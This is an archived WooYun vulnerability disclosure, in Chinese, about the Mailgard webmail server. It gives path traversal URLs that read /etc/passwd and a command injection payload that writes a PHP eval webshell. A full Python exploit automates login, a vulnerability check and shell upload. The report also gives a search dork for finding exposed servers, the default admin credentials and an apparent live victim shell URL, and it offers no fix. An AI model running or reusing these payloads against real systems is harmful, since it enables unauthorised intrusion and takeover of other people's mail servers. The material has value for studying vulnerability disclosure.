佑友(mailgard webmail)邮件服务器getshell 0day,附python exp

编号97649
Urlhttp://www.wooyun.org/bug.php?action=view&id=97649
漏洞状态已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞标题佑友(mailgard webmail)邮件服务器getshell 0day,附python exp
漏洞类型
厂商佑友
白帽子f4ckbaidu
提交日期2015-02-17 18:14:00
公开日期2015-05-29 17:18:00
修复时间(not set)
确认时间2015-02-28 00:00:00
Confirm Spend11
漏洞标签任意文件读取 目录遍历
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank11
漏洞简介
过年前来一发,能得个闪电吗?
漏洞细节

一、任意文件下载(需要登录)
百度搜索intitle:"mailgard webmail",多家没有改admin密码的中招,默认密码admin/hicomadmin
http://mail.xxx.com.cn/src/read_file.php?signature=../../../../../../../etc/passwd
http://mail.xxx.com.cn/src/read_file.php?uploadimage=../../../../../../../../../../etc/passwd
根据此漏洞读取lighttpd error.log得到web更目录:/var/www/newmail/

1.png


二、系统命令执行导致getshell
下载文件进行代码审计,找到一个命令执行漏洞
/var/www/newmail/src/ajaxserver.php第1789行开始:

if($_GET['exec'] == 'recall'){ // 撤回邮件
$user = str_replace('\\','\\\\',$_POST['user']);
$messageid = str_replace('\\','\\\\',$_POST['messageid']);
system(HM_SHELL."Mail_recall.sh '".$user."' '".$messageid."' '".$onlineip."' >null &");
unset($_SESSION['H_MAILS']['Sent']);echo 'ok';exit;
}


程序员sb,直接毁了magic_quotes_gpc和addslashes的防护(系统自身带了全局过滤,代码抄袭discuz的),导致getshell:
EXP如下,得到webshell,http://mail.sihc.com.cn/shell.php,密码123

http://mail.xxx.com.cn/src/ajaxserver.php?exec=recall
POST: user=1'|echo '<?php eval($_POST[123]); ?>'>/var/www/newmail/shell.php #&messageid=1


2.png


自动化exp如下:
用法python fuck.py http://mail.test.com:80/ 帐号 密码

import requests
import sys
if len(sys.argv) < 4:
print 'usage:python fuck.py http(s)://target:port/ <username> <password>'
print 'example:python fuck.py http://mail.test.com:80/ admin admin'
sys.exit(0)
else:
target = sys.argv[1]
if not target.endswith('/'):
target += '/'
username = sys.argv[2]
password = sys.argv[3]
sessionid = ''
def login(target,username,password):
login_request = ''
global sessionid
domain = target[(target.index('.')+1):(target.index(':',6))]
print 'domain=' + domain
login_url = target + 'index.php'
post_data = 'txtname=' + username + '&domain=' + domain + '&txtpwd=' + password + '&languages=zh-cn&button=%E7%99%BB+%E5%BD%95'
try:
login_request = requests.post(login_url,post_data,allow_redirects=False,verify=False,timeout=3)
if login_request.status_code == 302:
print 'login succeeded'
sessionid = login_request.cookies['PHPSESSID']
return sessionid
else:
print 'login failed,please check username and password'
return False
except Exception,e:
print Exception,":",e
return False
def check(target,sessionid):
check_request = ''
url = target + 'src/read_file.php?uploadimage=../../../../../../../../../../etc/passwd'
request_header = {'cookie': 'MAILSESSID=' + str(sessionid) + '; PHPSESSID=' + str(sessionid)}
try:
check_request = requests.get(url,headers=request_header,verify=False,timeout=3)
if 'root:x:0:0:root:/root:/bin/bash' in check_request.text and check_request.status_code == 200:
print 'target is vulnerable\r\n'
# print 'the content of file \'/etc/passwd\'\r\n'
# print check_request.text
return True
else:
print 'target is not vulnerable'
return False
except Exception,e:
print Exception,":",e
return False
def getshell(target,sessionid):
getshell_request = ''
fuckurl = target + 'src/ajaxserver.php?exec=recall'
getshell_header = {'cookie': 'MAILSESSID=' + str(sessionid) + '; PHPSESSID=' + str(sessionid)}
getshell_data = 'user=1\'|echo \'<?php eval($_POST[123]); ?>\'>/var/www/newmail/shell123.php #&messageid=1'
# print getshell_data
try:
getshell_request = requests.post(fuckurl,getshell_data,headers=getshell_header,allow_redirects=False,verify=False)
if (requests.get(target + 'shell123.php',verify=False).status_code == 200):
print 'getshell succeeded,address:' + str(target + 'shell123.php') + ' password:123'
else:
print 'getshell failed!'
except Exception,e:
print Exception,":",e
return False
if __name__ == '__main__':
if (login(target,username,password)):
print 'sessionid=' + sessionid
if(check(target,sessionid)):
print 'target is vulnerable to directory transversal'
else:
print 'target is not vulnerable to directory transversal'
print 'trying to getshell,please wait'
getshell(target,sessionid)


exp_usage.png

POC

百度搜索intitle:"mailgard webmail",多家没有改admin密码的中招,默认密码admin/hicomadmin

example1.png


example2.png


example3.png

修复方案

i don't know

状态信息 2015-02-17: 细节已通知厂商并且等待厂商处理中
2015-02-28: 厂商已经确认,细节仅向厂商公开
2015-03-03: 细节向第三方安全合作伙伴开放
2015-04-24: 细节向核心白帽子及相关领域专家公开
2015-05-04: 细节向普通白帽子公开
2015-05-14: 细节向实习白帽子公开
2015-05-29: 细节向公众公开
厂商回复CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。
回应信息危害等级:高漏洞Rank:11 确认时间:2015-02-28 17:16
Showing 1-2 of 2 items.
评论内容评论人点赞数评论时间

@f4ckbaidu 目测你要火啊

sql小神02015-05-29 17:24:00

exp写的有点问题,URL一定要带端口号才行

f4ckbaidu02015-02-19 15:19:00